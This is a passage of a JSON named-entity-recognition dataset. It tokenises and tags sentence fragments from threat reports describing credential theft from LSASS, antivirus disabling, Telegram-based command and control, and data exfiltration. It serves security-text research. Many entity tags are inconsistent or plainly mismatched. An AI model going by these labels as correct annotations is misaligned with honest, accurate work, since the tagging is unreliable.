"vulnerabilities", "in", "Microsoft", "SQL", "(MS", "SQL)", "Server", "for", "initial", "access" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "the", "payload", "downloaded", "by", "the", "PowerShell", "script", "was", "a", ".NET", "downloader,", "which", "would", "subsequently", "retrieve", "an", "encrypted", "payload", "from", "the", "command-and-control", "(C&C)", "server" ], "ner_tags": [ "O", "O", "O", "O", "O", "B-Way", "B-Tool", "O", "O", "B-Way", "B-Tool", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O", "O" ] }, { "tokens": [ "used", "different", "sets", "of", "defense", "evasion", "and", "reconnaissance", "tools", "such", "as", "GMER", "and", "Advance", "Process", "Termination", "to", "manually", "uninstall", "antivirus", "products", "on", "the", "target", "system." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O", "I-Tool", "I-Tool", "I-Tool", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "to", "terminate", "security-related", "processes", "and", "services", "by", "dropping", "KILLAV" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "B-Way" ] }, { "tokens": [ "the", "threat", "actors", "who", "perform", "brute-force", "attacks", "on", "MS", "SQL", "Servers." ], "ner_tags": [ "O", "O", "O", "O", "O", "B-Org", "B-OffAct", "O", "O", "O", "O" ] }, { "tokens": [ "executed", "a", "spam", "campaign", "with", "malicious", "OneNote", "file", "attachments," ], "ner_tags": [ "O", "O", "B-Org", "B-OffAct", "O", "O", "B-SamFile", "I-SamFile", "O" ] }, { "tokens": [ "The", "initial", "attack", "phase", "involves", "infiltrating", "Internet-facing", "Microsoft", "Exchange", "servers" ], "ner_tags": [ "O", "O", "B-OffAct", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "The", "malware", "implemented", "a", "series", "of", "Mimikatz", "modifications", "on", "closed-source", "tooling" ], "ner_tags": [ "O", "B-SamFile", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O" ] }, { "tokens": [ "staging", "a", "credential", "theft", "capability", "in", "the", "LSASS", "process", "itself", "by", "abusing", "native", "Windows", "capabilities" ], "ner_tags": [ "O", "O", "B-SamFile", "B-Purp", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "In", "order", "to", "steal", "credentials,", "the", "attackers", "employ", "custom", "modified", "versions", "of", "Mimikatz" ], "ner_tags": [ "O", "O", "O", "I-Purp", "O", "O", "B-HackOrg", "O", "O", "O", "O", "O", "B-Way" ] }, { "tokens": [ "stealing", "credentials", "from", "the", "Local", "Security", "Authority", "Subsystem", "Service", "(LSASS)", "process." ], "ner_tags": [ "B-Way", "B-Purp", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Mimikatz", "publicly", "available", "code", "(top);", "strings", "from", "a", "Mimikatz", "modification" ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O" ] }, { "tokens": [ "This", "call", "instructs", "LSASS", "to", "load", "and", "execute", "pc.dll,", "which", "then", "stages", "the", "getHashFlsa64.dll", "credential", "theft", "component." ], "ner_tags": [ "O", "O", "O", "B-Idus", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "B-Way", "O", "O", "O" ] }, { "tokens": [ "accesses", "the", "memory", "of", "its", "host", "LSASS", "process", "and", "stores", "stolen", "credentials", "in", "a", "Mimikatz", "log", "file" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Purp", "O", "O", "B-Way", "O", "O" ] }, { "tokens": [ "of", "a", "Security", "Package", "into", "LSASS", "using", "RPC", "calls." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "B-Way", "O" ] }, { "tokens": [ "steals", "credentials", "from", "LSASS" ], "ner_tags": [ "O", "O", "O", "O" ] }, { "tokens": [ "The", "threat", "actors", "used", "C:\\MS_DATA", "as", "their", "main", "working", "directory", "for", "storing", "malware", "and", "staging", "data", "for", "exfiltration" ], "ner_tags": [ "O", "O", "B-HackOrg", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "and", "Remote", "Desktop", "user", "sessions." ], "ner_tags": [ "O", "B-Way", "I-Tool", "I-Tool", "O" ] }, { "tokens": [ "cmd", "/c" ], "ner_tags": [ "B-SamFile", "B-SamFile" ] }, { "tokens": [ "cmd\"", "/c" ], "ner_tags": [ "B-SamFile", "O" ] }, { "tokens": [ "cmd\"", "/c" ], "ner_tags": [ "B-SamFile", "O" ] }, { "tokens": [ "cmd\"", "/c" ], "ner_tags": [ "B-SamFile", "O" ] }, { "tokens": [ "cmd", "/c" ], "ner_tags": [ "B-SamFile", "B-SamFile" ] }, { "tokens": [ "cmd", "/c" ], "ner_tags": [ "B-SamFile", "B-SamFile" ] }, { "tokens": [ "cmd", "/c" ], "ner_tags": [ "B-SamFile", "B-SamFile" ] }, { "tokens": [ "cmd", "/c" ], "ner_tags": [ "B-SamFile", "B-SamFile" ] }, { "tokens": [ "cmd", "/c" ], "ner_tags": [ "B-SamFile", "B-SamFile" ] }, { "tokens": [ "cmd", "/c" ], "ner_tags": [ "B-SamFile", "B-SamFile" ] }, { "tokens": [ "cmd", "/c" ], "ner_tags": [ "B-SamFile", "B-SamFile" ] }, { "tokens": [ "cmd", "/c" ], "ner_tags": [ "B-SamFile", "B-SamFile" ] }, { "tokens": [ "cmd", "/c" ], "ner_tags": [ "B-SamFile", "B-SamFile" ] }, { "tokens": [ "They", "also", "retrieve", "networking", "information,", "like", "network", "adapters,", "specific", "machines,", "and", "network", "services", "like", "Remote", "Desktop", "Protocol", "(RDP)." ], "ner_tags": [ "O", "O", "I-Features", "I-Features", "O", "O", "I-Tool", "O", "O", "O", "O", "I-Features", "I-Features", "O", "B-Way", "I-Tool", "I-Tool", "B-Way" ] }, { "tokens": [ "For", "lateral", "movement,", "the", "attackers", "made", "use", "of", "the", "PsExec", "tool", "and", "the", "net", "use", "command", "for", "accessing", "shared", "resources", "on", "remote", "machines." ], "ner_tags": [ "O", "O", "O", "O", "B-HackOrg", "O", "O", "O", "O", "B-Way", "B-Tool", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "and", "the", "PsExec", "Windows", "Sysinternals", "tool", "and", "net", "for", "lateral", "movement", "and", "exploration" ], "ner_tags": [ "O", "O", "B-Way", "B-Tool", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "loads", "and", "executes", "the", "decrypted" ], "ner_tags": [ "B-Features", "O", "B-Features", "O", "O" ] }, { "tokens": [ "pc.exe", "decrypts", "AddSecurityPackage64.dll", "and", "pc.dll", "using", "the", "AES", "encryption", "algorithm" ], "ner_tags": [ "B-SamFile", "O", "B-SamFile", "O", "B-SamFile", "O", "O", "B-Way", "O", "O" ] }, { "tokens": [ "pc.dll", "decrypts," ], "ner_tags": [ "B-SamFile", "B-SecTeam" ] }, { "tokens": [ "Disabling", "Windows", "event", "logging", "in", "an", "attempt", "to", "evade", "detection" ], "ner_tags": [ "B-Way", "I-Way", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "In", "an", "attempt", "to", "remain", "undetected,", "AddSecurityPackage64.dll", "disables", "Windows", "event", "logging", "by", "killing", "threads", "of", "the", "Windows", "Event", "Log", "service", "without", "stopping", "the", "execution", "of", "the", "service", "itself" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Injecting", "pc.dll", "into", "LSASS", "as", "a", "Security", "Package" ], "ner_tags": [ "B-Way", "B-Tool", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "to", "execute", "malicious", "code", "in", "the", "context", "of", "LSASS." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "B-Tool" ] }, { "tokens": [ "enumerating", "the", "processes’", "threads," ], "ner_tags": [ "O", "O", "O", "O" ] }, { "tokens": [ "tasklist" ], "ner_tags": [ "O" ] }, { "tokens": [ "informationAddSecurityPackage64.dll", "injects", "pc.dll", "into", "LSASS", "by", "deploying", "pc.dll", "as", "a", "Security", "Package" ], "ner_tags": [ "B-SamFile", "O", "B-Way", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O" ] }, { "tokens": [ "embedded", "JavaScript", "Observed", "Notation", "(JSON)-based", "configuration", "to", "set", "parameters" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "text-encoded", "in", "base64" ], "ner_tags": [ "O", "O", "O" ] }, { "tokens": [ "brute-force", "attacks" ], "ner_tags": [ "B-Org", "B-OffAct" ] }, { "tokens": [ "brute-forcing", "and", "compromising", "servers" ], "ner_tags": [ "O", "O", "O", "O" ] }, { "tokens": [ "Valid", "credentials" ], "ner_tags": [ "O", "O" ] }, { "tokens": [ "uploaded", "to", "the", "command-and-control", "(C&C)", "server," ], "ner_tags": [ "O", "O", "O", "B-Way", "O", "O" ] }, { "tokens": [ "usually", "at", "port", "5028/TCP" ], "ner_tags": [ "O", "O", "O", "O" ] }, { "tokens": [ "use", "several", "highly", "obfuscated", "and", "underdevelopment", "custom", "loaders" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "I-Tool", "O" ] }, { "tokens": [ "malicious", "RAR", "archive" ], "ner_tags": [ "O", "O", "O" ] }, { "tokens": [ "exploits", "CVE-2015-2291,", "an", "Intel", "driver", "vulnerability,", "to", "load", "a", "malicious", "driver", "designed", "to", "reduce", "the", "token", "integrity", "of", "Microsoft", "Defender." ], "ner_tags": [ "O", "B-Features", "O", "O", "O", "B-Exp", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "deploying", "a", "malicious", "kernel", "mode", "driver", "(“bring", "your", "own", "vulnerable", "driver”", "or", "BYOVD", "method)", "via", "exploiting", "a", "vulnerable", "Intel", "driver" ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "install", "an", "information", "stealer." ], "ner_tags": [ "O", "O", "O", "O" ] }, { "tokens": [ "stealer," ], "ner_tags": [ "B-SamFile" ] }, { "tokens": [ "keylogger", "with", "logging", "capabilities", "using", "the", "Telegram", "API" ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "distributed", "to", "victims", "via", "phishing", "attempts" ], "ner_tags": [ "O", "O", "O", "O", "B-Way", "O" ] }, { "tokens": [ "embedded", "binary", "files" ], "ner_tags": [ "O", "O", "O" ] }, { "tokens": [ "archive", "contains", "the", "files," ], "ner_tags": [ "O", "O", "O", "O" ] }, { "tokens": [ "deobfuscate,", "decompress," ], "ner_tags": [ "O", "O" ] }, { "tokens": [ "decrypts", "strings" ], "ner_tags": [ "O", "O" ] }, { "tokens": [ "deobfuscation,", "and", "decompression" ], "ner_tags": [ "O", "O", "O" ] }, { "tokens": [ "decompressing" ], "ner_tags": [ "O" ] }, { "tokens": [ "decompresses", "it", "using", "the", "GZipStream", "API," ], "ner_tags": [ "O", "O", "O", "O", "B-Way", "B-Tool" ] }, { "tokens": [ "masquerades", "as", "a", "legitimate", "word", "document" ], "ner_tags": [ "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "legitimize", "the", "package", "in", "the", "eyes", "of", "the", "victim" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "designed", "to", "lure", "unsuspecting", "victims", "into", "executing", "the", "loader." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "is", "executed", "by", "the", "victim" ], "ner_tags": [ "O", "O", "O", "O", "O" ] }, { "tokens": [ "utilizes", "Telegram", "for", "delivering", "payloads" ], "ner_tags": [ "O", "O", "O", "O", "O" ] }, { "tokens": [ "download" ], "ner_tags": [ "O" ] }, { "tokens": [ "used", "to", "send", "program", "execution", "DEBUG", "and", "Telegram", "to", "deliver", "payloads", "and", "send", "commands." ], "ner_tags": [ "O", "O", "O", "O", "O", "B-HackOrg", "O", "O", "O", "O", "B-HackOrg", "O", "O", "O" ] }, { "tokens": [ "downloads", "the", "next", "part" ], "ner_tags": [ "O", "O", "O", "O" ] }, { "tokens": [ "utilizes", "Telegram", "for", "delivering", "payloads,", "sending", "commands,", "and", "receiving", "the", "payload", "heartbeat." ], "ner_tags": [ "O", "O", "O", "I-Features", "B-HackOrg", "I-Features", "O", "O", "I-Features", "I-Features", "I-Features", "O" ] }, { "tokens": [ "send", "commands." ], "ner_tags": [ "O", "O" ] }, { "tokens": [ "sends", "a", "request", "to", "the", "attacker-controlled", "Telegram", "channel" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "sends", "the", "message", "\"bot", "getted\"", "to", "the", "debug", "server." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "accepts", "commands", "from", "a", "Telegram", "channel," ], "ner_tags": [ "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "message", "to", "both", "the", "Debug", "server", "and", "the", "Telegram", "channel," ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "sends", "a", "GET", "request", "to", "https://api[.]telegram[.]org/bot{token}/getUpdates", "to", "retrieve", "the", "command" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "API", "hashing" ], "ner_tags": [ "B-SecTeam", "B-SecTeam" ] }, { "tokens": [ "resolves", "hashed", "Windows", "APIs" ], "ner_tags": [ "O", "O", "O", "O" ] }, { "tokens": [ "conceal", "the", "utilization", "of", "potentially", "suspicious", "APIs", "(functions)", "from", "static", "detection" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "replacing", "the", "human-readable", "names", "of", "functions", "(such", "as", "\"CreateMutexW\")", "with", "a", "hash", "value," ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "B-SamFile", "O", "O", "O", "O" ] }, { "tokens": [ "used", "in", "the", "code", "to", "call", "the", "corresponding", "API", "function" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "employs", "dynamic", "API", "resolving", "to", "conceal", "its", "API", "imports" ], "ner_tags": [ "O", "I-Way", "I-Way", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "storing", "the", "names", "or", "hashes", "of", "the", "APIs", "needed,", "then", "importing", "them", "dynamically", "at", "runtime." ], "ner_tags": [ "B-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "passes", "two", "arguments", "to", "the", "\"mw_resolveAPI\"", "function." ], "ner_tags": [ "O", "O", "O", "O", "O", "B-SamFile", "O" ] }, { "tokens": [ "resolves", "the", "given", "API", "hash", "and", "retrieves", "the", "address", "of", "an", "exported", "function" ], "ner_tags": [ "B-Features", "O", "O", "O", "O", "O", "B-Features", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "creating", "a", "hash", "for", "each", "export", "function", "name" ], "ner_tags": [ "I-Features", "I-Features", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "string", "encryption," ], "ner_tags": [ "O", "O" ] }, { "tokens": [ "irrelevant", "code" ], "ner_tags": [ "O", "O" ] }, { "tokens": [ "LoadLibrary", "and", "GetProcAddress", "functions" ], "ner_tags": [ "B-Way", "O", "B-Way", "O" ] }, { "tokens": [ "Compressapi" ], "ner_tags": [ "B-SamFile" ] }, { "tokens": [ "GetTokenInformation", "API." ], "ner_tags": [ "B-Way", "B-Tool" ] }, { "tokens": [ "retrieves", "the", "MachineGuid", "of", "the", "infected", "system", "from", "the", "SOFTWARE\\Microsoft\\Cryptography\\MachineGuid", "registry", "key" ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O", "O" ] }, { "tokens": [ "retrieves", "the", "MachineGuid", "of", "the", "infected", "system", "from", "the", "\"SOFTWARE\\Microsoft\\Cryptography\\MachineGuid\"", "registry", "key." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "B-SamFile", "O", "O" ] }, { "tokens": [ "deletes", "the", "HKCU\\SOFTWARE\\Intel", "registry", "key", "and", "recreates", "it" ], "ner_tags": [ "O", "O", "B-SamFile", "O", "O", "O", "O", "O" ] }, { "tokens": [ "collects", "information", "about", "the", ".NET", "Framework", "Setup" ], "ner_tags": [ "I-Features", "I-Features", "O", "O", "B-SamFile", "O", "O" ] }, { "tokens": [ "elevate", "its", "privileges", "by", "executing", "the", "mw_UAC_bypass", "function" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "B-Way", "O" ] }, { "tokens": [ "Calling", "Local", "Windows", "RPC", "Servers", "from", ".NET" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "bypass", "user", "account", "control", "(UAC)", "using", "only", "two", "remote", "procedure", "call", "(RPC)", "requests" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O", "B-Tool", "O" ] }, { "tokens": [ "executes", "an", "export", "function", "called", "\"Entry\"", "from", "UpdateTask.dll", "via", "rundll32.exe" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "B-SamFile", "O", "B-SamFile" ] }, { "tokens": [ "payload", "through", "rundll32.exe" ], "ner_tags": [ "O", "O", "B-SamFile" ] }, { "tokens": [ "disable", "Microsoft", "Defender" ], "ner_tags": [ "O", "O", "B-SecTeam" ] }, { "tokens": [ "patch", "the", "integrity", "level", "of", "the", "Microsoft", "defender", "(MsMpEng.exe)", "and", "forcibly", "reduce", "it", "from", "system", "to", "untrusted", "integrity." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "determine", "if", "it", "is", "running", "as", "an", "account", "with", "administrator", "privileges", "or", "simply", "as", "a", "regular", "user" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "creating", "scheduled", "tasks" ], "ner_tags": [ "O", "O", "O" ] }, { "tokens": [ "sets", "up", "its", "working", "directory" ], "ner_tags": [ "O", "O", "O", "O", "O" ] }, { "tokens": [ "collect", "system", "information", "and", "steals", "user", "information" ], "ner_tags": [ "I-Features", "I-Features", "I-Features", "O", "I-Features", "I-Features", "I-Features" ] }, { "tokens": [ "tokens,", "and", "passwords", "from", "various", "web", "browsers", "and", "applications" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "captures", "screenshots" ], "ner_tags": [ "O", "O" ] }, { "tokens": [ "compressed", "and", "exfiltrated", "to", "the", "attacker", "via", "Telegram" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "some", "strings,", "such", "as", "web", "browser", "paths", "and", "Geolocation", "API", "services", "URLs,", "are", "encrypted", "with", "the", "AES", "algorithm", "in", "cipher-block", "chaining", "(CBC)", "mode" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "gathers", "basic", "system", "information," ], "ner_tags": [ "B-Features", "I-Features", "I-Features", "O" ] }, { "tokens": [ "for", "the", "infected", "system", "by", "gathering", "the", "username", "and", "hostname" ], "ner_tags": [ "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O" ] }, { "tokens": [ "the", "malware", "then", "proceeds", "to", "gather", "basic", "system", "information,", "including", "username,", "computer", "name,", "and", "OS", "version," ], "ner_tags": [ "O", "B-SamFile", "O", "O", "O", "O", "I-Features", "I-Features", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "System", "info,", "including", "both", "hardware", "and", "OS", "info." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Collection", "of", "information", "about", "the", "system", "in", "HTML", "format" ], "ner_tags": [ "I-Features", "I-Features", "I-Features", "O", "O", "O", "O", "B-Way", "O" ] }, { "tokens": [ "and", "hostname" ], "ner_tags": [ "O", "O" ] }, { "tokens": [ "gathers", "basic", "system", "information,", "which", "it", "then", "sends", "to", "the", "C2," ], "ner_tags": [ "B-Features", "I-Features", "I-Features", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "send", "a", "list", "of", "process", "names", "and", "IDs", "back", "to", "the", "C2" ], "ner_tags": [ "B-Way", "B-Features", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "the", "system", "information", "gathered", "by", "Domino", "Backdoor", "and", "sent", "to", "the", "C2" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "B-Tool", "O", "O", "O", "O", "O" ] }, { "tokens": [ "in", "return", "receives", "an", "AES", "encrypted", "payload." ], "ner_tags": [ "O", "O", "O", "O", "B-SamFile", "O", "O" ] }, { "tokens": [ "uses", "a", "custom", "algorithm", "which", "XOR’s", "multiple", "values", "together." ], "ner_tags": [ "O", "O", "O", "O", "O", "B-Idus", "O", "O", "O" ] }, { "tokens": [ "which", "is", "stored", "immediately", "before", "the", "encrypted", "config", "block." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "The", "malware", "generates", "a", "random", "32-byte", "key,", "which", "it", "encrypts", "using", "the", "RSA", "key." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "B-Tool" ] }, { "tokens": [ "loading", "an", "encrypted", "payload", "from", "its", "resources" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "The", "Microsoft", "WinCrypt", "library", "is", "used", "for", "AES", "encryption", "and" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "B-Way", "B-Tool", "O" ] }, { "tokens": [ "the", "encrypted", "config." ], "ner_tags": [ "O", "O", "O" ] }, { "tokens": [ "be", "based", "on", "an", "encryption", "algorithm", "used", "previously", "in" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "by", "gathering", "the", "username", "and" ], "ner_tags": [ "O", "O", "O", "O", "O" ] }, { "tokens": [ "to", "gather", "basic", "system", "information,", "including", "username," ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "is", "generated", "from", "the", "system", "username" ], "ner_tags": [ "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "used", "a", "similar", "XOR-based", "algorithm", "as", "part", "of", "its", "encryption", "mechanisms", "during", "communication", "with", "the", "C2." ], "ner_tags": [ "O", "O", "O", "B-Way", "B-Tool", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "then", "proceeds", "to", "gather", "basic", "system", "information,", "including", "username,", "computer", "name,", "and", "OS", "version,", "which", "it", "then", "encrypts", "using", "AES-256-CBC", "and", "the", "generated," ], "ner_tags": [ "O", "O", "O", "O", "I-Features", "I-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O" ] }, { "tokens": [ "then", "sends", "the", "AES-encrypted", "system", "data." ], "ner_tags": [ "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "This", "data", "is", "then", "encrypted", "using", "AES", "and", "returned", "to", "the", "C2." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O" ] }, { "tokens": [ "the", "decrypted", "config", "contains", "two", "pipe-delimited", "IP", "addresses" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "and", "decrypts", "them", "using", "XOR", "and", "the", "key" ], "ner_tags": [ "O", "O", "O", "O", "B-Way", "O", "O", "O" ] }, { "tokens": [ "The", "malware", "then", "proceeds", "to", "decrypt", "its", "configuration", "block," ], "ner_tags": [ "O", "B-SamFile", "O", "O", "O", "O", "O", "B-Features", "O" ] }, { "tokens": [ "The", "config", "is", "decrypted", "using", "XOR", "and", "a", "16-byte", "key" ], "ner_tags": [ "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O" ] }, { "tokens": [ "A", "second", "config", "block,", "which", "is", "decrypted", "separately" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "The", "decrypted", "data", "consists", "of", "a", "4", "byte", "size" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "The", "malware", "then", "decrypts", "the", "received", "payload", "using", "AES", "and", "the", "shared", "key." ], "ner_tags": [ "O", "B-SamFile", "O", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O" ] }, { "tokens": [ "which", "decrypts", "to", "the", "following", "5", "bytes" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "decrypting", "it", "using", "AES-256-CBC", "and", "a", "hardcoded", "key." ], "ner_tags": [ "O", "O", "O", "B-Way", "O", "O", "O", "O" ] }, { "tokens": [ "The", "decrypted", "data", "consists", "of", "4", "bytes", "containing", "the", "payload", "size," ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "B-Features", "O", "B-Features", "O" ] }, { "tokens": [ "The", "Microsoft", "WinCrypt", "library", "is", "used", "for", "AES", "encryption", "and", "decryption", "by", "both" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O" ] }, { "tokens": [ "is", "decrypted", "using", "XOR", "and", "a", "16-byte", "key" ], "ner_tags": [ "O", "O", "O", "B-Way", "O", "O", "O", "O" ] }, { "tokens": [ "executes", "the", "decrypted", "shellcode" ], "ner_tags": [ "O", "O", "O", "O" ] }, { "tokens": [ "loads", "the", "resources", "using", "the", "API", "calls", "LdrFindResource_U", "and", "LdrAccessResource" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "B-SamFile", "O", "B-SamFile" ] }, { "tokens": [ "and", "execute", "the", "file", "using", "CreateProcessA." ], "ner_tags": [ "O", "O", "O", "O", "O", "B-SamFile" ] }, { "tokens": [ "utilising", "similar", "API", "calls," ], "ner_tags": [ "O", "O", "O", "O" ] }, { "tokens": [ "the", "malware", "enumerates", "the", "running", "processes", "on", "the", "system", "and", "compiles", "a", "list", "of", "process", "names", "and", "IDs." ], "ner_tags": [ "O", "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "enumerate", "running", "processes", "and", "send", "a", "list", "of", "process", "names", "and", "IDs", "back", "to", "the", "C2" ], "ner_tags": [ "O", "O", "B-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Enumerates", "running", "processes" ], "ner_tags": [ "O", "O", "O" ] }, { "tokens": [ "the", "loader", "allocates", "memory", "within", "the", "current", "process", "and", "then", "loads", "the", "PE", "payload", "into", "it", "using", "the", "full", "PE", "loading", "procedure." ], "ner_tags": [ "O", "O", "O", "I-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O", "O" ] }, { "tokens": [ "It", "copies", "the", "headers,", "maps", "the", "individual", "PE", "sections,", "processes", "any", "relocations,", "loads", "the", "PE’s", "imports,", "and", "then", "executes", "the", "PE", "from", "its", "internally", "specified", "entry", "point." ], "ner_tags": [ "B-SamFile", "I-Features", "I-Features", "B-HackOrg", "I-Features", "I-Features", "I-Features", "B-HackOrg", "O", "B-Features", "O", "B-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "passes", "the", "PE", "payload", "to", "it,", "which", "the", "shellcode", "then", "loads", "and", "executes." ], "ner_tags": [ "O", "O", "B-Way", "O", "O", "O", "O", "O", "B-SamFile", "O", "O", "O", "O" ] }, { "tokens": [ "Enumerate", "files", "on", "desktop" ], "ner_tags": [ "B-SamFile", "B-Features", "O", "O" ] }, { "tokens": [ "Enumerates", "files", "under", "Steam", "application", "directory" ], "ner_tags": [ "B-SamFile", "B-Features", "O", "O", "O", "O" ] }, { "tokens": [ "looping", "through", "entries", "under", "registry", "key" ], "ner_tags": [ "B-Way", "I-Way", "O", "O", "O", "O" ] }, { "tokens": [ "waits", "for", "data", "collection", "tasks", "to", "complete," ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "creating", "a", "hash", "of", "the", "collected", "data,", "to", "which", "it", "then", "appends", "its", "current", "process", "id." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "uploads", "data", "to", "the", "C2", "via", "a", "HTTP", "POST", "request" ], "ner_tags": [ "B-Features", "I-Features", "O", "O", "O", "O", "O", "B-Way", "O", "O" ] }, { "tokens": [ "http/https", "data", "transfer" ], "ner_tags": [ "O", "O", "O" ] }, { "tokens": [ "Self-delete", "after", "sending", "data" ], "ner_tags": [ "O", "O", "O", "O" ] }, { "tokens": [ "It", "then", "attempts", "to", "connect", "to", "the", "C2", "via", "TCP", "port", "443" ], 